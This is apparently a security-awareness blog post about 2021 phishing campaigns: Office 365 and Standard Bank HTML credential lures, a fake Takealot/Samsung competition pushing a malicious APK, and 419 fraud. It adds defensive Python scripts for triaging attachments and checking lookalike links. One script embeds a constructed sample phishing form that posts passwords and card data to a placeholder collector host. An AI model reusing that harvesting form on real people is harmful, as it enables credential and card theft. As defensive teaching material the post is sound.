Only four months into 2021, there has been no slow-down for cyber criminals and their crafty campaigns. The year has already seen some of the most sophisticated hacks and breaches internationally, and unfortunately there is no end in sight.
The following are some of the major campaigns we have witnessed in March and April of this year alone:
Office 365 ‘Payment Received.html’ phishing
Standard Bank ‘SBSA_Statement.html’ phishing
Takealot/Samsung competition phishing malware
419 Phishing/Fraud
Office 365 ‘Payment Received.html’ phishing campaign
Microsoft Office, whether desktop or cloud (365), is one of those ‘essential’ business tools that is simply unmatched by its competitors, as the usage numbers show. According to Microsoft’s FY20 Q1 results, Office 365 had exceeded 200 million monthly active users. Unlike the traditional desktop MS Office, Office 365, or as it is now formally known, Microsoft 365, provides a multitude of cloud-based tools and features, including the ability for companies to move on-premises solutions such as MS Exchange, Active Directory and even workstations into the cloud. This essentially eliminates the need for expensive servers, high-end workstations and the teams of IT professionals required to maintain them, making it a perfectly logical move for start-ups and small-to-medium businesses (SMBs).
Cyber criminals are never far behind the latest security and world trends, and will always find ways to refine their techniques to pwn (hacker slang for ‘own’, i.e. fully compromise) their victims.
Below is an example of how crafty they can be. The file ‘Payment Received.html’ is distributed via email, with a body reading something along the lines of “please find attached payment”. When the attachment is opened, the user is presented with the page shown below.
There are two indicators here that a user needs to be aware of to identify this as a scam:
- The browser address bar shows a local file path (file:///…) rather than Microsoft’s sign-in address (https://login.microsoftonline.com). HTML files are self-contained web pages which can be opened offline, which is exactly why a page that merely looks like a sign-in form can be emailed as an attachment.
- Microsoft 365 does NOT show a blurred preview of documents or its user interface behind the login prompt. Keep in mind that Microsoft serves a wide variety of customers, including enterprises, with security and privacy among its top selling points.
Beyond these two indicators, the fake login page looks believable for the most part. Cyber criminals actively target Microsoft 365 users because it is easier to fool a person than to brute-force their way in using other methods.
MS Office 365 fake login page
The login prompt is a form whose script POSTs (submits) the entered credentials to a server presumed to be owned by the cyber criminals. With the credentials in hand, they sign in to the victim’s mailbox, read the address book and send the same email, with the same ‘Payment Received.html’ attachment, to every contact. Because the follow-on mail is sent from the compromised account, with the body adjusted to suit, recipients are easily fooled into believing it genuinely came from the compromised user.
Standard Bank ‘SBSA_Statement.html’ phishing campaign
Similar to the Microsoft 365 campaign, this campaign relies on tricking users into entering their credentials into a fake login page built by the criminals.
Emailed bank statements are another area in which cyber criminals have taken advantage of users’ trust. This is a more directed attack, aimed at stealing funds from the victims and potentially using the stolen information to apply for loans, purchase goods and/or sign up for paid services.
Most, if not all, banks in South Africa utilise electronic communications and have an established trust relationship with their customers. Anybody with a bank account, or dealing in finance, will have received secured statements at some time or another, which makes this campaign that much more believable.
The cyber criminals take full advantage of the trust built by the banking system and set up fake login pages that look very similar to Standard Bank’s and, in this case, blatantly request the user’s card number, CVV, expiry date and phone number. This is exactly the information required to make online purchases.
There are two indicators here that a user needs to be aware of to identify this as a scam:
- The browser address bar shows a local file path (file:///…) rather than an https address on the bank’s own domain. HTML files are self-contained web pages which can be opened offline, so a fake ‘portal’ can simply be attached to an email.
- No bank will ask for your credit or debit card details as login information to view a statement. A card’s CVV is an extra layer of authentication for online purchases, on the assumption that a person who knows the CVV must be in possession of the card.
Fake login box
The login box contains a form that POSTs (submits) the entered data to an online resource, usually a web server, in this case one controlled by the criminals. Keep in mind that this page is not the bank’s online portal; it is a file somebody created to look like one. The information is sent to an unknown location, where it will most likely be used for fraud or sold on the dark web to the highest bidder.
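Both the Office 365 and Standard Bank lures above come down to the same mechanism: a local HTML file whose form POSTs secrets to a remote host. The script below is an added example, not code from the original post, showing how an analyst can triage an .html attachment for exactly that pattern. The sample attachment, its field names and the collector hostname are constructed for illustration.

```python
"""Triage an .html email attachment for credential-harvesting forms.

Added example, not code from the original post. The sample attachment and
every hostname in it are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse

# Constructed stand-in for a lure such as 'Payment Received.html' or
# 'SBSA_Statement.html': a local file whose form POSTs to a remote host.
SAMPLE_ATTACHMENT = """
<html><body style="background:url(blurred-invoice.png) no-repeat">
<form id="login" method="post" action="https://collector.example.invalid/post.php">
  <input type="email" name="login" placeholder="Email, phone, or Skype">
  <input type="password" name="passwd" placeholder="Password">
  <input type="hidden" name="campaign" value="payment-received">
  <input type="text" name="cardnumber" placeholder="Card number">
  <input type="text" name="cvv" maxlength="3" placeholder="CVV">
  <button type="submit">Sign in</button>
</form>
</body></html>
"""

# Field names that a statement viewer or a mail login never legitimately needs.
PAYMENT_FIELD = re.compile(r"card|cvv|cvc|expir|pin", re.I)


class FormCollector(HTMLParser):
    """Collect every <form> together with the <input> fields declared inside it."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Dict] = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append(
                {"type": (a.get("type") or "text").lower(), "name": a.get("name", "")})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def triage(html: str) -> List[str]:
    """Return human-readable findings; an empty list means no form-based lure seen."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        action = urlparse(form["action"])
        # A file opened from disk has no business submitting anywhere remote.
        if action.netloc:
            findings.append(f"form submits via {form['method'].upper()} "
                            f"to remote host {action.netloc}")
        passwords = [f["name"] for f in form["fields"] if f["type"] == "password"]
        if passwords:
            findings.append("collects password field(s): " + ", ".join(passwords))
        payment = [f["name"] for f in form["fields"] if PAYMENT_FIELD.search(f["name"])]
        if payment:
            findings.append("collects card/payment field(s): " + ", ".join(payment))
    return findings


def is_credential_lure(html: str) -> bool:
    """True when a form both posts off-host and asks for secrets."""
    found = triage(html)
    remote = any(f.startswith("form submits") for f in found)
    secrets = any(f.startswith("collects") for f in found)
    return remote and secrets


if __name__ == "__main__":
    for line in triage(SAMPLE_ATTACHMENT):
        print("-", line)
    print("verdict:", "credential lure" if is_credential_lure(SAMPLE_ATTACHMENT) else "clean")
```

The verdict deliberately requires both signals: a form that posts to a remote host and one that asks for a password or card data. A form with only a relative action, or a page with no form at all, is reported but not flagged, which keeps the check useful on real attachments without drowning the analyst in noise.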
Takealot/Samsung competition phishing malware campaign
WhatsApp-distributed phishing malware campaigns have become increasingly common since smart phones became a personal vault of digital information.
Most people have their smartphones linked to every digital account they own and, if that is not bad enough, the phone is also used as a controller for home automation systems and devices, as a second factor of authentication, as a camera, as mobile storage for digital content (documents, photos, videos, etc.) and even as a personal computer.
This makes compromising a smartphone all the more alluring to cyber criminals, who hope to be rewarded generously based on the amount of data they manage to obtain. Smartphones, however, are mobile devices: they are on the go and connect to many different networks during an average day. They have also become increasingly secure, making them harder targets.
Two of the several methods used to compromise a smartphone are to gain physical access to it, via theft or otherwise, or to have the user or owner grant access to the cyber criminal themselves. The latter is much simpler than most people think, and WhatsApp-distributed phishing malware disguised as a competition is one such method.
One such campaign was camouflaged as a Takealot competition to win a Samsung Galaxy S21 smartphone. To enter, the user is required to answer four simple questions and then share the link with ten of their WhatsApp friends or contacts.
The final step is to download an APK file. APK files are installation packages for Android apps; installing one from outside the Google Play store requires the user to allow installs from unknown sources, which is precisely the permission the campaign relies on the victim granting. Once installed, the app steals personal data from the phone and potentially tracks the user’s activity, monitoring things like online banking transactions or service logins. The data is shared with the perpetrator and sold on the dark web and/or used in further schemes and campaigns targeting more users, or to hold victims to ransom.
The following are the details of this campaign:
- The campaign is distributed by unwitting users, not by the hackers themselves, via WhatsApp.
- The URL is clearly shown in the message and does not belong to Takealot or Samsung.
- The web page has fake comments from fake Facebook users.
- None of the links besides the questionnaire function in any way.
- The campaign changes depending on where in the world the URL is accessed from.
- The screenshots below (blue and red) were captured using the same computer, browser and URL. The only difference was the location chosen in the VPN software.
- One version specifies South Africa whereas the other specifies Seychelles. Everything else remains the same.
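The second indicator above, that the link does not belong to Takealot or Samsung, is the one most people get wrong, because lookalike links are built to survive a glance: the brand name is placed in a subdomain, in the path, or before an @ sign so that the real host is something else entirely. The following is an added example, not code from the original post, of checking a shared link against a brand’s real domains. The brand domain list is an assumption for illustration, and the sample links are constructed.

```python
"""Check whether a 'competition' link really belongs to the brand it claims.

Added example, not code from the original post. The brand list is an
assumption (only these registered domains count as the brands' own), and
the sample links are constructed.
"""
from urllib.parse import urlsplit

# Assumption: these registered domains, and their subdomains, are the brands' own.
BRAND_DOMAINS = {"takealot.com", "samsung.com"}


def hostname_of(url: str) -> str:
    """Lower-cased host of the link, with userinfo, port and trailing dot removed."""
    if "://" not in url:
        url = "http://" + url          # bare links as pasted into a chat
    return (urlsplit(url).hostname or "").rstrip(".").lower()


def belongs_to_brand(url: str, brands=BRAND_DOMAINS) -> bool:
    """True only for the brand domain itself or a genuine subdomain of it.

    'takealot.com.evil.example' ends with 'example', not '.takealot.com',
    and 'takealot.com@evil.example' has the host 'evil.example', so both fail.
    """
    host = hostname_of(url)
    return any(host == d or host.endswith("." + d) for d in brands)


def classify(url: str, brands=BRAND_DOMAINS) -> str:
    """'brand', 'lookalike' (brand name anywhere in a foreign link) or 'unrelated'."""
    if belongs_to_brand(url, brands):
        return "brand"
    names = {d.split(".")[0] for d in brands}   # e.g. 'takealot', 'samsung'
    if any(n in url.lower() for n in names):
        return "lookalike"
    return "unrelated"


if __name__ == "__main__":
    for link in ("https://www.takealot.com/promo",
                 "https://takealot.com.win-galaxy-s21.example/",
                 "https://takealot.com@win-galaxy-s21.example/",
                 "https://short.example/abc"):
        print(f"{classify(link):10} {link}")
```

Note that the check parses the link instead of searching it for the brand name: the brand name appearing in the text is what makes a link a lookalike, so matching on the registered domain of the actual host is the only test that holds up.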
419 Phishing/Fraud Campaign
419 scams, also known as advance-fee scams, originated in the early 1980s and are still prevalent in 2021. The scam is usually simple but effective, targeting a user on a personal level, especially their finances. The campaign is spread via email and, for the most part, offers targets large sums of money or winnings. There have also been cases where the campaign is scripted to draw emotion and sympathy from the target. Everyone wishes they could win a lottery, but winning without ever playing is unheard of, and yet many people still fall for this absurd premise.
The 419 campaign emails do not contain malicious file attachments or links; instead they rely on a specially crafted email body. The message content usually follows a “…need money to become a better person…” or “collect your winnings/funds…” storyline, relying on the target to initiate communication. The emails are distributed to anyone and everyone.
In these scams the cyber criminal replies to whatever the target sends, whether via email or other communication platforms, and the game plan in every case is financial exploitation of the target.
The example below is clearly fraudulent and will never reach the point of pay-out. The intention is to have the target send funds to pay for the ‘transactions’ supposedly required to expedite the pay-out. Once the funds are received, the scammers either attempt to extract more with excuses such as ‘unforeseen duties’ or ‘shortages due to exchange rates’, or simply disappear.
The further examples below are lottery 419 campaigns, but can be treated exactly the same as the one mentioned above.
One needs to watch out for these campaigns and any that are similar. Based on experience, if the offer or giveaway cannot be found on the original company’s website, or in store, then it is likely to be fake. Threat actors are actively impersonating popular stores and taking advantage of people’s need to save as much money as possible in these difficult economic times.